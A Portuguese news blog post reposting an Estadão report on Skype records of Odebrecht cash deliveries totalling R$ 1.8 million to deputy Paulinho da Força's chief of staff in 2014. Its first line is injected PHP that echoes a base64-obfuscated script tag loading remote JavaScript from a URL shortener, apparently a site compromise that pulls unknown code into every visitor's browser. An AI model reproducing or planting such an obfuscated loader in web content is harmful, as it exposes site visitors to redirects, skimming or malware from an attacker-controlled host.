$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Áudios apontam repasses de R$ 1,8 milhão a Paulinho

Foto: José Cruz/Agência Brasil
03 Jun 2019

Do Estadão:

Conversas de Skype registradas pela transportadora de valores usada pela Odebrecht para efetuar pagamentos ilícitos em São Paulo indicam quatro entregas de dinheiro no valor total de R$ 1,8 milhão para o chefe de gabinete do deputado federal Paulo Pereira da Silva (SD-SP), o Paulinho da Força. Segundo as mensagens, os repasses foram feitos entre agosto e setembro de 2014 para Marcelo de Lima Cavalcanti na sede da Força Sindical, presidida por Paulinho até 2018.

Os diálogos obtidos pelo Estado foram entregues à Polícia Federal por um ex-funcionário da Transnacional, empresa contratada pelo doleiro Álvaro José Novis para fazer entregas de dinheiro a serviço da Odebrecht. As mensagens apontam três pagamentos de R$ 500 mil com as senhas “ford”, “volkswagen” e “chevrolet” e um de R$ 300 mil com a palavra-chave “pandeiro” – todos destinados a Cavalcanti no 11.º andar da Rua Rocha Pombo, 94, prédio da Força Sindical, no bairro da Liberdade, centro da capital paulista.

A soma dos valores apontados no arquivo é quase o dobro do que a empreiteira afirmou ter pago a Paulinho em 2014 no acordo de colaboração firmado com o Ministério Público Federal (MPF). Em depoimento prestado em dezembro de 2016, Fernando Reis, ex-presidente da Odebrecht Ambiental, disse que durante encontro em um café próximo ao prédio da Força Sindical, o deputado pediu doação em caixa 2 para a campanha dele à reeleição. “Acertamos R$ 1 milhão de contribuição.”

O ex-executivo relatou que o repasse foi feito em duas parcelas e estava vinculado ao apoio político de Paulinho à empresa em uma greve ocorrida na Embraport, empresa que era do grupo, no Porto de Santos, em novembro de 2013, e da invasão da sede da Odebrecht por integrantes do Movimento dos Trabalhadores Sem-Teto (MTST) em maio de 2014, em protestos contra a Copa do Mundo.

“Esse pagamento tinha como objetivo que a gente mantivesse com ele uma relação boa e, através dele, quase que uma tutoria para a gente saber lidar melhor com os movimentos sindicais e centrais sindicais”, disse Reis em depoimento prestado no dia 13 de dezembro de 2016 ao MPF. Segundo ele, a Odebrecht já contribuía legalmente com R$ 100 mil todo ano para a realização da festa de 1.º de Maio organizada pela Força.

Segundo planilha da Odebrecht anexada ao acordo de colaboração, dois pagamentos de R$ 500 mil foram feitos nos dias 4 e 11 de setembro de 2014 com as senhas “volkswagen” e “chevrolet”, respectivamente. A delação é parte de um inquérito que tramita no Supremo Tribunal Federal (STF) sob relatoria do ministro Luís Roberto Barroso. Em fevereiro, ele prorrogou a investigação por mais 60 dias.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *